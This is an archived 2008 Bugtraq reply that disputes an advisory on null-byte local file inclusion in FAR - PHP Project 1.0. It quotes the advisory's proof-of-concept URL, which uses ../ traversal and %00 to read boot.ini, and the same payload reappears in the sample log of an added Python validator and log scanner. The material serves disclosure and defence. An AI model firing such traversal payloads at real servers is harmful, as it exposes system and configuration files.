Open Source and information security mailing list archives
Date: Thu, 21 Aug 2008 21:46:53 -0400
From: William McAfee <sec-community@...goodhacker.com>
To: beenudel1986@...il.com
Cc: bugtraq@...urityfocus.com
Subject: Re: Null Byte Local file Inclusion in FAR - PHP Project version:1.0

I'm sorry, but your screenshot actually leads me to not have much more
confidence. I noticed your titlebar is modified, so that tells me the
script is most likely modified in some way. Provide us with a pure script,
please.

Also, on an unrelated note, why are you running professional? Why did you
blank out the bottom half of the window? What are you hiding?

On Wed, 2008-08-20 at 20:56 -0600, beenudel1986@...il.com wrote:
> ################################################################
> # .___ __ _______ .___ #
> # __| _/____ _______| | __ ____ \ _ \ __| _/____ #
> # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
> # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
> # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
> # \/ \/ \/ #
> # ___________ ______ _ __ #
> # _/ ___\_ __ \_/ __ \ \/ \/ / #
> # \ \___| | \/\ ___/\ / #
> # \___ >__| \___ >\/\_/ #
> # est.2007 \/ \/ forum.darkc0de.com #
>
> ################################################################
>
> # Web Application: FAR - PHP Project version:1.0
> # Vendor's Address :www.far-php.ro
> ################################################################
>
>
> ################################################################
> Author: Beenu Arora
> Address: www.beenuarora.com
> ################################################################
>
>
> #Python Dark Scripts: www.beenuarora.com/work.html
>
> ################################################################
> #Date Found: 21/08/08
> #Severity: High
> #Security Risk: Null Byte Files Retrieval
> #Explanation: It is possible to view the contents of any file (e.g.
> databases, user information or configuration files) on the web server
> (under the permission restrictions of the web server user)
>
>
> #POC: http://localhost/farver/index.php?c=/../../../../../../../../boot.ini%00
> #For the POC pic visit: www.beenuarora.com/POC.bmp
>
> ################################################################
> ______________________________________________________________________________________
> |Greetz: D3hydr8,rascal,rsauron,patrick,baltazar,sinner_01 and rest of team members.  |
> |_____________________________________________________________________________________|
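The thread above disputes the screenshot, not the mechanism. The mechanism the advisory describes is a page-selecting parameter (`c`) reaching an include with a null byte and `../` segments in it; on legacy PHP versions the NUL could truncate the path handed to the filesystem, so an appended suffix such as `.php` gave no protection. The following Python is an added, defender-side example, not code from the FAR - PHP project or from either poster: it shows the checks that reject the quoted proof-of-concept request before it could reach an include, and runs the same checks over a constructed access log so the pattern can be spotted after the fact. `ALLOWED_PAGES`, `BASE_DIR`, the helper names and the log lines are all assumptions made for illustration.

```python
"""Defender-side validation for a page-selecting query parameter.

Added example, not code from the FAR - PHP project or from this thread.
It models the checks that would stop the reported request: a null byte
(%00) in the include path, and "../" sequences that walk the include
outside the intended directory. ALLOWED_PAGES, BASE_DIR and the log
lines are constructed for illustration.
"""
import re
from pathlib import PurePosixPath
from urllib.parse import parse_qs, urlsplit

# Hypothetical allowlist: the only page names the application ships.
ALLOWED_PAGES = {"home", "about", "contact"}
# Hypothetical directory the application includes pages from.
BASE_DIR = PurePosixPath("/var/www/farver/pages")

# Request field of an Apache combined-format line, e.g. "GET /x.php?c=home HTTP/1.1"
_REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def decode_param(url, name):
    """Return the percent-decoded value of query parameter `name`, or None.

    parse_qs turns %00 into a real NUL character, which is what a PHP
    application would see in $_GET before passing the value to include().
    """
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(name)
    return values[0] if values else None


def classify(value):
    """Return ("ok", include_path) or ("reject", reason) for one decoded value."""
    if "\x00" in value:
        # A NUL in a filesystem path is never legitimate input.
        return ("reject", "null byte")
    if "/" in value or "\\" in value or ".." in value:
        # Reject any attempt to leave the include directory.
        return ("reject", "path separator or traversal")
    if value not in ALLOWED_PAGES:
        # Positive validation: only listed pages may be included.
        return ("reject", "not in allowlist")
    return ("ok", str(BASE_DIR / f"{value}.php"))


def check_request(url):
    """Validate the `c` parameter of a full URL or a bare request path."""
    value = decode_param(url, "c")
    if value is None:
        return ("reject", "missing parameter")
    return classify(value)


def scan_access_log(lines):
    """Return (request_path, reason) for each logged request whose `c` fails validation."""
    findings = []
    for line in lines:
        match = _REQUEST_RE.search(line)
        if not match:
            continue
        path = match.group(1)
        value = decode_param(path, "c")
        if value is None:
            continue  # request did not use the page-selecting parameter
        verdict, detail = classify(value)
        if verdict == "reject":
            findings.append((path, detail))
    return findings


# Constructed sample log: one benign request and one shaped like the
# proof-of-concept URL quoted in the advisory.
SAMPLE_LOG = [
    '127.0.0.1 - - [21/Aug/2008:20:56:00 -0600] '
    '"GET /farver/index.php?c=home HTTP/1.1" 200 1234',
    '127.0.0.1 - - [21/Aug/2008:20:56:05 -0600] '
    '"GET /farver/index.php?c=/../../../../../../../../boot.ini%00 HTTP/1.1" 200 567',
]

if __name__ == "__main__":
    for path, reason in scan_access_log(SAMPLE_LOG):
        print(f"rejected {path}: {reason}")
```

The null-byte check is the one the quoted request trips first, but the allowlist is the control that makes the rest of the input irrelevant: the decoded value is never used as a path at all, only as a key into a fixed set of page names. Note that the checks run on the decoded value (after `%00` has become a NUL), which is the form the application would actually pass on; checking the raw query string for the literal text `%00` would miss other encodings of the same byte.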